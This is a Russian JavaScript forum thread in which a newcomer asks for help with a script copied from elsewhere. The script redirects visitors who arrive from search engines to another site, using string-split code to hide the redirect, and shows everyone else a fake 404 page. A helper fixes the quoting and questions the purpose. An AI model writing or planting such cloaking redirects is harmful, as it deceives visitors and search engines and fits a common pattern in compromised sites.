Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 09.03.2015, 18:51
Новичок на форуме
Отправить личное сообщение для a.n.lekomtsev Посмотреть профиль Найти все сообщения от a.n.lekomtsev
 
Регистрация: 09.03.2015
Сообщений: 6

Проблемный редирект
Всем добра.

Подскажите, пожалуйста, почему не работает редирект такого вида? Проверяю на денвере таким образом. Сделал страничку 1.google.html, в которой ссылка на пост. А на странице поста вставляю этот код. Вставлял в хедер и в сам пост. Что я не так делаю? Извиняюсь, если совсем все тупо) С явой не дружен пока.

<script type="text/javascript">
function R(){
var Ref=document.referrer;

if (Ref.indexOf(`.google.`)!=-1 || Ref.indexOf(`.bing.`)!=-1 || Ref.indexOf(`.yahoo.`)!=-1 || Ref.indexOf(`.aol.`)!=-1 || Ref.indexOf(`.ask.`)!=-1 || Ref.indexOf(`.altavista.`)!=-1 || Ref.indexOf(`.bing.`)!=-1 )
{ document.write(`<script language="javascript" type="text/javascript">docu`+`ment.location="http://www.mysite.ru"</s`+`cript>`)}

else {
document.write(`<h1>404 Not Found</h1>`);
}
}

R();
</script>
Ответить с цитированием
  #2 (permalink)  
Старый 09.03.2015, 19:07
Аватар для danik.js
Профессор
Отправить личное сообщение для danik.js Посмотреть профиль Найти все сообщения от danik.js
 
Регистрация: 11.09.2010
Сообщений: 8,804

За дибилов чтоле держишь? Апострофов наставил вместо кавычек )
Хотя в ФФ должно вроде работать. Это из ES6.
__________________
В личку только с интересными предложениями
Ответить с цитированием
  #3 (permalink)  
Старый 09.03.2015, 21:08
Новичок на форуме
Отправить личное сообщение для a.n.lekomtsev Посмотреть профиль Найти все сообщения от a.n.lekomtsev
 
Регистрация: 09.03.2015
Сообщений: 6

Сообщение от danik.js
За дибилов чтоле держишь?
Нет. Это я скопировал так с сайта стороннего.

Сообщение от danik.js
Апострофов наставил вместо кавычек )
А вот тут реально помогло) Спасибо.
Ответить с цитированием
  #4 (permalink)  
Старый 09.03.2015, 22:06
Новичок на форуме
Отправить личное сообщение для a.n.lekomtsev Посмотреть профиль Найти все сообщения от a.n.lekomtsev
 
Регистрация: 09.03.2015
Сообщений: 6

А вот еще вопросик по второй части редиректа.

else {
document.write('<script type="text/javascript">document.location=""</script>');
}

Вот такой код по кругу обновляет страницу. А надо бы, если не с поиковика переход, просто все оставить как есть без бесконечного обновления. Такое можно осуществить?
Ответить с цитированием
  #5 (permalink)  
Старый 10.03.2015, 05:28
Аватар для danik.js
Профессор
Отправить личное сообщение для danik.js Посмотреть профиль Найти все сообщения от danik.js
 
Регистрация: 11.09.2010
Сообщений: 8,804

Как я понял, код делает следующее:
Код:
если (пришли_с_поисковика)
    редирект_на_главную()
иначе
    выдаем_наёбку_Not_Found
Что в этом алгоритме не устраивает?
__________________
В личку только с интересными предложениями
Ответить с цитированием
  #6 (permalink)  
Старый 10.03.2015, 10:09
Новичок на форуме
Отправить личное сообщение для a.n.lekomtsev Посмотреть профиль Найти все сообщения от a.n.lekomtsev
 
Регистрация: 09.03.2015
Сообщений: 6

Сообщение от danik.js
Что в этом алгоритме не устраивает?
Вот ккак раз наебка Not Found. Хотелось бы, чтоб если не с поиска заходили на страницу, а допустим с другой страницы или с прямого захода из адресной, то пост отображался бы как есть. Без редиректа и наебок. Такое реально?
Ответить с цитированием
  #7 (permalink)  
Старый 10.03.2015, 10:22
Аватар для danik.js
Профессор
Отправить личное сообщение для danik.js Посмотреть профиль Найти все сообщения от danik.js
 
Регистрация: 11.09.2010
Сообщений: 8,804

Сообщение от a.n.lekomtsev
Такое реально?
Убрать ветвь else, не? И вообще, нафига это издевательство с редиректом? Какая разница откуда юзер пришел?
__________________
В личку только с интересными предложениями
Ответить с цитированием
  #8 (permalink)  
Старый 10.03.2015, 12:50
Новичок на форуме
Отправить личное сообщение для a.n.lekomtsev Посмотреть профиль Найти все сообщения от a.n.lekomtsev
 
Регистрация: 09.03.2015
Сообщений: 6

Сообщение от danik.js Посмотреть сообщение
Убрать ветвь else, не? И вообще, нафига это издевательство с редиректом? Какая разница откуда юзер пришел?
Не могу сказать, но это очень важно)
лол. Вот я тупорез))) Спасибо

Последний раз редактировалось a.n.lekomtsev, 10.03.2015 в 12:53.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
редирект по завершению submit Илья86 Общие вопросы Javascript 2 02.12.2014 17:54
jquery анимация и редирект после SunYang Events/DOM/Window 5 17.05.2012 12:10
Input - получить текст и сделать редирект hell100 Общие вопросы Javascript 9 28.02.2012 20:06
Внутренний редирект с помощью PHP mister_maxim Серверные языки и технологии 2 30.03.2011 18:10
30(1|2) редирект от сервера. Или как лучше сделать редирект при верной отсылке форма. pizzZ AJAX и COMET 2 18.02.2010 09:06